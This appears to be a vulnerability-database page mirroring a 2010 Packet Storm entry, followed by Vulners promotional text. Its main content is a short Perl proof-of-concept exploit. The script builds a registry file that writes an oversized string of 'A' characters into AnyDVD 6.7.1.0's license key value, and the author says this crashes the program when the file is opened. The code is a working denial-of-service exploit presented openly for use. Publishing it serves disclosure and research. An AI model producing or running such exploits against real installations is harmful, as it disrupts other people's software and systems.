Lucene search
K

AnyDVD 6.7.1.0 Denial Of Service

🗓️ 24 Oct 2010 00:00:00Reported by HavokType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

AnyDVD 6.7.1.0 Denial Of Service vulnerability in REGEDIT

Code
`#!/usr/bin/perl  
#AnyDVD <= 6.7.1.0 Denial Of Service Vulnerability  
#By Havok, from France. (c'est les vacances \o/. Mais y a plus d'essence :(. Rime de leet spotted :P).  
#23/10/2010  
#Tested on Windows XP SP3.  
#Software still available here at the moment : http://static.slysoft.com/SetupAnyDVD.exe  
#It seems that RegAnyDVD.exe is our friend. :)  
  
my $w00T_omg= "\x41" x 7777;  
open(file,">DoS.AnyDVD");  
print file "REGEDIT4\n\n";  
print file "[HKEY_LOCAL_MACHINE\\Software\\SlySoft\\AnyDVD\\Key]\n";  
print file "\"Key\"=\"$w00T_omg\"";  
print "The file has been created successfully. Open it and BOOM. Cheers!";  
close(file);  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation